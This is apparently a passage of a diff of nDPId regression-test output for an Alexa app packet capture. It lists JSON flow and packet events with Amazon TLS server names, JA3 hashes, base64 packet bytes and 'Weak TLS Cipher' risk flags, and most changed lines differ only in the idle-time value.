{"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/61Tfp7ZVcoL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} 00640{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2438,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976022741,"flow_last_seen":1490976022741,"flow_idle_time":120000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1490976140054,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2438,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976022731,"flow_last_seen":1490976022731,"flow_idle_time":120000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1490976140054,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ffd3:fbc2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 
-00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2480,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976142629,"flow_last_seen":1490976142629,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976142629,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40878,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2480,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":132,"flow_packet_id":1,"flow_last_seen":1490976142629,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976142629,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8Si5AAEAGxLmsECrYNu8d\/Z+uAbuBOjwrAAAAAKAC\/\/9GYAAAAgQFtAQCCAoA9nYFAAAAAAEDAwg="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2481,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":132,"flow_packet_id":2,"flow_last_seen":1490976142691,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976142691,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw0iJAAOcGldA27x39rBAq2AG7n66gUyr3gTo8LHASH\/4OHAAAAgQFtAEDAwY="} 
-00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2482,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":132,"flow_packet_id":3,"flow_last_seen":1490976142696,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976142696,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoSi9AAEAGxMysECrYNu8d\/Z+uAbuBOjwsoFMq+FAQAVdYjQAA"} -00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2483,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976142629,"flow_last_seen":1490976142698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1490976142698,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40878,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01026{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2484,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976142629,"flow_last_seen":1490976142816,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":328,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1490976142816,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40878,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": 
{"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2506,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976150029,"flow_last_seen":1490976150029,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976150029,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45750,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2506,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":133,"flow_packet_id":1,"flow_last_seen":1490976150029,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976150029,"pkt":"AMDKkaPvePiC0\/vCCABFAAA86ydAAEAGW8esECrYNF7ohrK2AbvOUJPOAAAAAKAC\/\/\/DwQAAAgQFtAQCCAoA9njpAAAAAAEDAwg="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2507,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":133,"flow_packet_id":2,"flow_last_seen":1490976150125,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976150125,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwoZ9AAOcG\/lo0XuiGrBAq2AG7sra0EJrCzlCTz3ASH\/4K2QAAAgQFtAEDAwY="} 
-00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2508,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":133,"flow_packet_id":3,"flow_last_seen":1490976150126,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976150126,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo6yhAAEAGW9qsECrYNF7ohrK2AbvOUJPPtBCaw1AQAVdVSgAA"} -00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2509,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976150029,"flow_last_seen":1490976150127,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976150127,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45750,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2511,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976150029,"flow_last_seen":1490976150196,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976150196,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45750,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": 
{"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -00707{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2517,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1490976031691,"flow_last_seen":1490976032855,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1346,"flow_tot_l4_payload_len":2154,"flow_avg_l4_payload_len":215,"midstream":0,"thread_ts_msec":1490976150210,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49572,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2480,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976142629,"flow_last_seen":1490976142629,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976142629,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40878,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2480,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":132,"flow_packet_id":1,"flow_last_seen":1490976142629,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976142629,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8Si5AAEAGxLmsECrYNu8d\/Z+uAbuBOjwrAAAAAKAC\/\/9GYAAAAgQFtAQCCAoA9nYFAAAAAAEDAwg="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2481,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":132,"flow_packet_id":2,"flow_last_seen":1490976142691,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976142691,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw0iJAAOcGldA27x39rBAq2AG7n66gUyr3gTo8LHASH\/4OHAAAAgQFtAEDAwY="} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2482,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":132,"flow_packet_id":3,"flow_last_seen":1490976142696,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976142696,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoSi9AAEAGxMysECrYNu8d\/Z+uAbuBOjwsoFMq+FAQAVdYjQAA"} 
+00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2483,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976142629,"flow_last_seen":1490976142698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1490976142698,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40878,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01026{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2484,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976142629,"flow_last_seen":1490976142816,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":328,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1490976142816,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40878,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} 
+00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2506,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976150029,"flow_last_seen":1490976150029,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976150029,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45750,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2506,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":133,"flow_packet_id":1,"flow_last_seen":1490976150029,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976150029,"pkt":"AMDKkaPvePiC0\/vCCABFAAA86ydAAEAGW8esECrYNF7ohrK2AbvOUJPOAAAAAKAC\/\/\/DwQAAAgQFtAQCCAoA9njpAAAAAAEDAwg="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2507,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":133,"flow_packet_id":2,"flow_last_seen":1490976150125,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976150125,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwoZ9AAOcG\/lo0XuiGrBAq2AG7sra0EJrCzlCTz3ASH\/4K2QAAAgQFtAEDAwY="} 
+00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2508,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":133,"flow_packet_id":3,"flow_last_seen":1490976150126,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976150126,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo6yhAAEAGW9qsECrYNF7ohrK2AbvOUJPPtBCaw1AQAVdVSgAA"} +00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2509,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976150029,"flow_last_seen":1490976150127,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976150127,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45750,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2511,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976150029,"flow_last_seen":1490976150196,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976150196,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45750,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": 
{"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} 00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2517,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976027958,"flow_last_seen":1490976030758,"flow_idle_time":120000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1490976150210,"l3_proto":"ip4","src_ip":"172.16.42.1","dst_ip":"172.16.42.216","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2517,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976032763,"flow_last_seen":1490976032763,"flow_idle_time":120000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1490976150210,"l3_proto":"ip6","src_ip":"fe80::7af8:82ff:fed3:fbc2","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 
00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2517,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1490976023731,"flow_last_seen":1490976031750,"flow_idle_time":120000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1490976150210,"l3_proto":"ip6","src_ip":"fe80::7af8:82ff:fed3:fbc2","dst_ip":"ff02::2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} -00697{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2517,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1490976035553,"flow_last_seen":1490976036358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5712,"flow_avg_l4_payload_len":238,"midstream":0,"thread_ts_msec":1490976150210,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38363,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2531,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976158680,"flow_last_seen":1490976158680,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976158680,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45751,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2531,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":134,"flow_packet_id":1,"flow_last_seen":1490976158680,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976158680,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8\/ohAAEAGSGasECrYNF7ohrK3Abt2joLDAAAAAKAC\/\/8pLAAAAgQFtAQCCAoA9nxLAAAAAAEDAwg="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2532,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":134,"flow_packet_id":2,"flow_last_seen":1490976158840,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976158840,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwc8dAAOcGLDM0XuiGrBAq2AG7sreYM6oZdo6CxHASH\/6AKwAAAgQFtAEDAwY="} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2533,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":134,"flow_packet_id":3,"flow_last_seen":1490976158841,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976158841,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo\/olAAEAGSHmsECrYNF7ohrK3Abt2joLEmDOqGlAQAVfKnAAA"} 
-00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2534,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976158680,"flow_last_seen":1490976158842,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976158842,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45751,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2535,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976158680,"flow_last_seen":1490976159147,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976159147,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45751,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} 
-00706{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1490976044439,"flow_last_seen":1490976046418,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":996,"flow_tot_l4_payload_len":2175,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49589,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}} -00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1490976041156,"flow_last_seen":1490976043655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":10376,"flow_avg_l4_payload_len":324,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45661,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 
